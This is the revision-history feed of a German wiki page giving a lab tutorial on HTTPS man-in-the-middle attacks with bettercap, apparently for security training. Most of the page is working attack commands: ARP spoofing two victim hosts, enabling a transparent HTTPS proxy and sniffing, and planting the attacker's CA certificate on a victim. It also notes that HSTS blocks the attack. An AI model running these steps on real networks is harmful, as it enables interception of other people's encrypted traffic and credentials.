https://wiki.ixheim.de/index.php?action=history&feed=atom&title=HTTPS_MITM_mit_bettercap HTTPS MITM mit bettercap - Versionsgeschichte 2026-06-28T19:33:12Z Versionsgeschichte dieser Seite in Xinux Wiki MediaWiki 1.35.1 https://wiki.ixheim.de/index.php?title=HTTPS_MITM_mit_bettercap&diff=69931&oldid=prev Thomas.will: Die Seite wurde neu angelegt: „= HTTPS MITM mit bettercap = Eine HTTPS MITM Attacke erlaubt es den verschlüsselten HTTPS-Traffic zwischen Opfer und Server mitzulesen. bettercap kombiniert d…“ 2026-05-11T15:19:38Z <p>Die Seite wurde neu angelegt: „= HTTPS MITM mit bettercap = Eine HTTPS MITM Attacke erlaubt es den verschlüsselten HTTPS-Traffic zwischen Opfer und Server mitzulesen. bettercap kombiniert d…“</p> <p><b>Neue Seite</b></p><div>= HTTPS MITM mit bettercap =<br /> Eine HTTPS MITM Attacke erlaubt es den verschlüsselten HTTPS-Traffic zwischen Opfer und Server mitzulesen. bettercap kombiniert dazu ARP Spoofing mit einem transparenten HTTPS Proxy.<br /> <br /> == Umgebung ==<br /> KALI = 192.168.16.101 (Angreifer)<br /> ALICE = 192.168.16.131 (Opfer 1)<br /> BOB = 192.168.16.132 (Opfer 2)<br /> <br /> == Voraussetzung ==<br /> ;IP-Forwarding auf Kali aktivieren<br /> echo 1 &gt; /proc/sys/net/ipv4/ip_forward<br /> <br /> == Angreifer - bettercap starten ==<br /> sudo bettercap -iface eth0<br /> <br /> == In der bettercap-Konsole ==<br /> ;ARP MITM + HTTPS Proxy kombiniert<br /> set arp.spoof.targets 192.168.16.131,192.168.16.132<br /> set arp.spoof.internal true<br /> set arp.spoof.fullduplex true<br /> arp.spoof on<br /> https.proxy on<br /> net.sniff on<br /> <br /> == Optionen https.proxy ==<br /> ;Hilfe anzeigen<br /> help https.proxy<br /> * https.proxy.address → Bind-Adresse des Proxy (default=0.0.0.0)<br /> * https.proxy.port → Port des Proxy (default=8083)<br /> * https.proxy.certificate → Pfad zum CA-Zertifikat<br /> * https.proxy.key → Pfad zum CA-Key<br /> * https.proxy.script → Javascript für Manipulation der Requests<br /> <br /> == Zertifikat ==<br /> ;bettercap generiert automatisch ein selbstsigniertes CA-Zertifikat<br /> ;Der Browser des Opfers zeigt eine Zertifikatswarnung<br /> ;Zertifikat liegt unter<br /> ~/.bettercap-ca.cert.pem<br /> ;Auf dem Opfer installieren um Warnung zu unterdrücken (Labor)<br /> sudo cp ~/.bettercap-ca.cert.pem /usr/local/share/ca-certificates/bettercap.crt<br /> sudo update-ca-certificates<br /> <br /> == Test auf Alice ==<br /> ;HTTPS-Seite aufrufen<br /> curl -k https://xinux.de<br /> ;Auf Kali sollte der Traffic im net.sniff sichtbar sein<br /> <br /> == Hinweis ==<br /> * Moderne Browser mit '''HSTS''' (HTTP Strict Transport Security) blockieren diesen Angriff<br /> * '''HSTS Preload''' Domains (google.com, facebook.com etc.) sind nicht angreifbar<br /> * Funktioniert gut gegen interne Webserver ohne HSTS<br /> <br /> == Mögliche Folgeangriffe ==<br /> * [[Web Spoofing mit bettercap]]<br /> * [[DNS Spoofing mit bettercap]]<br /> * [[mitmproxy]]<br /> <br /> == Siehe auch ==<br /> * [[ARP Spoofing mit bettercap]]<br /> * [[bettercap]]</div> Thomas.will